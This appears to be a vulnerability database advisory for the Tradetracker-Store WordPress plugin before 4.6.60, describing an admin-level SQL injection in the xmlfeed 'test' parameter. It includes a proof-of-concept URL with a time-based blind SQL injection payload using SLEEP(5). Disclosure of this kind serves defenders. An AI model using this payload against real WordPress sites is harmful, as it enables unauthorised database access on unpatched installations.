WordPress Plugin Vulnerabilities
Tradetracker-Store < 4.6.60 - Admin+ SQL Injection
Description
The test parameter of the xmlfeed in the plugin is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection.
Proof of Concept
https://example.com/wp-admin/admin.php?page=tt-store&option=xmlfeed&test=1%20AND%20(SELECT%209966%20FROM%20(SELECT(SLEEP(5)))OhCe) HTTP/1.1
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Syed Sheeraz Ali of Codevigilant
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-13 (about 3 years ago)
Added
2022-02-14 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)